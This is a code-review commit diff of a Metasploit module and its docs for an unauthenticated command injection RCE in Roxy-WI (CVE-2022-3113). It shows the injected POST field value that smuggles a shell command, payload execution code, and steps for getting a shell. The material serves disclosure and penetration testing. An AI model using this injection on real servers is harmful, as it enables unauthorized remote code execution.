Apply suggestions from code review
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
This commit is contained in:
Nuri Çilengir
@@ -10,7 +10,7 @@ Successful exploitation results in remote code execution under the context of th
|
||||
|
||||
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
|
||||
|
||||
[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py)
|
||||
https://roxy-wi.org/installation.py#manual
|
||||
|
||||
```
|
||||
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
|
||||
@@ -24,12 +24,11 @@ chown -R www-data:www-data haproxy-wi
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/roxy_wi_exec`
|
||||
4. Set `RHOST`
|
||||
5. Set `LHOST`
|
||||
4. Set `RHOST` to the address of the target Roxy-WI machine.
|
||||
5. Set `LHOST` to the address of your attacking machine.
|
||||
8. Run `exploit`
|
||||
9. Do: `run`
|
||||
10. You should get a shell.
|
||||
11. **Verify** that you are getting meterpreter session.
|
||||
10. You should get a shell as the user running the Roxy-WI server.
|
||||
|
||||
## Options
|
||||
Set `TAGETURI` if the Roxy-WI is installed at a custom path.
|
||||
|
||||
@@ -14,20 +14,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Roxy-WI Unauthenticated Remote Code Execution',
|
||||
'Name' => 'Roxy-WI < 6.1.1.0 Unauthenticated Command Injection RCE',
|
||||
'Description' => %q{
|
||||
This module exploits command injection vulnerability to achieve remote code execution.
|
||||
Unauthenticated users can execute a terminal command under the context of the web server user.
|
||||
|
||||
Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. In versions 6.1.1.0 and earlier,
|
||||
an unauthenticated user can execute some methods of administrator functions without needing any credentials.
|
||||
Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account,
|
||||
existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes,
|
||||
or execute operating system command under the context of the web-server user.
|
||||
This module exploits an unauthenticated command injection vulnerability in Roxy-WI
|
||||
prior to version 6.1.1.0. Successful exploitation results in remote code execution
|
||||
under the context of the web server user.
|
||||
|
||||
Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Nuri Çilengir <nuri@prodaft.com>' # Author & Metasploit module
|
||||
'Nuri Çilengir <nuri[at]prodaft.com>' # Author & Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory
|
||||
@@ -67,14 +64,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),
|
||||
'vars_post' => {
|
||||
'serv' => '127.0.0.1',
|
||||
'ipbackend' => "poc\"; #{cmd} ;#",
|
||||
'ipbackend' => "\"; #{cmd} ;#",
|
||||
'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),
|
||||
'backend_server' => '127.0.0.1'
|
||||
}
|
||||
}, 10
|
||||
)
|
||||
rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
|
||||
fail_with(Failure::Unknown, "#{peer} - Something went wrong!")
|
||||
fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
|
||||
end
|
||||
|
||||
def check
|
||||
@@ -97,14 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
print_status 'Trying to detect command injection vulnerability.'
|
||||
|
||||
begin
|
||||
if target['Arch'] == ARCH_PYTHON
|
||||
execute_command("python3 -c \"#{payload.encoded}\"")
|
||||
else
|
||||
execute_command(payload.encoded)
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
|
||||
fail_with(Failure::Unknown, 'Something went wrong!')
|
||||
else
|
||||
execute_command(payload.encoded)
|
||||
rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
|
||||
fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
|
||||
else
|
||||
print_good('Exploit successfully executed.')
|
||||
end
|
||||
end
|
||||
|
||||
Reference in New Issue
Block a user